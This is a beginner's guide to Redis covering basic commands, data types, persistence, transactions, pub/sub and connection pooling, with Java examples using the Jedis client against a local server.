
Redis Basic Usage Guide and Java Application Practice

Redis is an open-source, in-memory key-value store written in ANSI C, with networking support and optional persistence. Thanks to its excellent performance it is widely used in many scenarios, including caching, message queues, session sharing, and leaderboards. It was created by Salvatore Sanfilippo, and its development was for a time sponsored by Pivotal. Redis supports a rich set of data types, such as strings, lists, sets, sorted sets, hashes, bitmaps, HyperLogLogs, and geospatial indexes.

In Java, Redis is usually accessed through a client library such as Jedis, Lettuce, or Spring Data Redis. These libraries provide convenient APIs for connecting to the Redis server, storing and retrieving data, working with the individual data types, and handling transactions.

Some basic Redis usage:

1. Basic commands
Basic key-value operations cover creating, deleting, looking up, and modifying keys, for example:
- SET key value: set a key to a value.
- GET key: get the value associated with a key.
- DEL key: delete a key.
- EXPIRE key seconds: set a time-to-live on a key.
- TTL key: get the remaining time-to-live of a key.

2. Data structure operations
Each data type comes with its own commands (items 1 and 2 are illustrated in the first Jedis sketch below):
- Lists: LPUSH/RPUSH/LPOP/RPOP and related commands, useful for implementing queues and stacks.
- Sets: SADD/SREM/SISMEMBER and related commands, suited to deduplication, intersections, and unions.
- Sorted sets: ZADD/ZRANGE/ZREVRANGE and related commands, commonly used for leaderboards.
- Hashes: HSET/HGET/HDEL and related commands, convenient for storing object-like data.

3. Persistence
Redis offers two persistence mechanisms, RDB (Redis Database) and AOF (Append Only File):
- RDB: point-in-time snapshots of the dataset taken at configured intervals.
- AOF: every write command is logged and replayed at server startup to rebuild the dataset.

4. Transactions
Redis transactions are built from the MULTI, EXEC, and WATCH commands. Commands issued between MULTI and EXEC are queued and then executed sequentially as a single batch; with WATCH for optimistic locking, the whole queued transaction is discarded if a watched key changes before EXEC (see the pool-and-transaction sketch below).

5. Publish/subscribe
Redis's publish/subscribe feature, with commands such as PUBLISH, SUBSCRIBE, and PSUBSCRIBE, can be used to build messaging systems (see the pub/sub sketch below).

6. Connection pool management
When operating Redis from Java through a client library, a connection pool is the main tool for managing and optimizing connections: it lets connections be reused, reducing the overhead of repeatedly establishing and tearing them down.

The above covers only a small part of basic Redis usage; real-world scenarios and operations are considerably more involved. Mastering Redis is essential for building high-performance applications: developers need to be familiar not only with its commands and operations but also with its data structures and internal mechanics in order to get the most out of it in practice.
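To make items 1 and 2 concrete, here is a minimal sketch using the Jedis client mentioned above. It assumes a Redis server on localhost:6379 with no password; the key names and values are made up for illustration.

```java
import redis.clients.jedis.Jedis;

public class RedisBasicsExample {
    public static void main(String[] args) {
        // Assumes a local Redis on the default port; adjust host/port as needed.
        try (Jedis jedis = new Jedis("localhost", 6379)) {
            // 1. Basic key-value commands
            jedis.set("greeting", "hello");           // SET key value
            String value = jedis.get("greeting");     // GET key
            jedis.expire("greeting", 60);             // EXPIRE key seconds
            long ttl = jedis.ttl("greeting");         // TTL key
            jedis.del("greeting");                    // DEL key

            // 2. Data structure commands
            jedis.lpush("task:queue", "job1", "job2");           // list used as a queue
            String job = jedis.rpop("task:queue");

            jedis.sadd("visitors", "user:1", "user:2");          // set for deduplication
            boolean seen = jedis.sismember("visitors", "user:1");

            jedis.zadd("leaderboard", 1500, "player:1");         // sorted set for a leaderboard
            jedis.zadd("leaderboard", 2100, "player:2");

            jedis.hset("user:1", "name", "Alice");               // hash for object-like data
            String name = jedis.hget("user:1", "name");

            System.out.printf("value=%s ttl=%d job=%s seen=%b name=%s%n",
                    value, ttl, job, seen, name);
        }
    }
}
```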
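Items 4 and 6 can be sketched together: a JedisPool reuses connections, and multi()/exec() with watch() queue and run commands as one batch. The pool sizes, key names, and values below are illustrative assumptions, not settings taken from the original guide.

```java
import java.util.List;

import redis.clients.jedis.Jedis;
import redis.clients.jedis.JedisPool;
import redis.clients.jedis.JedisPoolConfig;
import redis.clients.jedis.Transaction;

public class RedisPoolAndTransactionExample {
    public static void main(String[] args) {
        // A shared pool avoids the cost of opening a new connection per operation.
        JedisPoolConfig poolConfig = new JedisPoolConfig();
        poolConfig.setMaxTotal(16);   // illustrative sizing
        poolConfig.setMaxIdle(8);

        try (JedisPool pool = new JedisPool(poolConfig, "localhost", 6379)) {
            try (Jedis jedis = pool.getResource()) {   // borrow a connection; close() returns it
                jedis.set("account:1:balance", "100");

                // Optimistic locking: abort the transaction if the key changes before EXEC.
                jedis.watch("account:1:balance");
                int balance = Integer.parseInt(jedis.get("account:1:balance"));

                Transaction tx = jedis.multi();        // MULTI: start queuing commands
                tx.set("account:1:balance", String.valueOf(balance - 30));
                tx.rpush("account:1:history", "withdraw:30");

                // EXEC runs the queued commands as one sequential batch;
                // it yields null when a WATCHed key was modified in the meantime.
                List<Object> results = tx.exec();
                if (results == null) {
                    System.out.println("Transaction aborted, retry needed");
                }
            }
        }
    }
}
```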
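For item 5, a small pub/sub sketch (the channel name and message are made up). Since SUBSCRIBE blocks the connection it runs on, the subscriber gets its own connection on a separate thread; overriding only onMessage assumes a reasonably recent Jedis version.

```java
import redis.clients.jedis.Jedis;
import redis.clients.jedis.JedisPubSub;

public class RedisPubSubExample {
    public static void main(String[] args) throws InterruptedException {
        // SUBSCRIBE blocks its connection, so run the subscriber on its own thread.
        Thread subscriber = new Thread(() -> {
            try (Jedis jedis = new Jedis("localhost", 6379)) {
                jedis.subscribe(new JedisPubSub() {
                    @Override
                    public void onMessage(String channel, String message) {
                        System.out.println("received on " + channel + ": " + message);
                        unsubscribe();   // stop after the first message for this demo
                    }
                }, "notifications");
            }
        });
        subscriber.start();
        Thread.sleep(500);   // crude wait until the subscription is registered

        try (Jedis publisher = new Jedis("localhost", 6379)) {
            publisher.publish("notifications", "cache invalidated");   // PUBLISH channel message
        }
        subscriber.join();
    }
}
```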

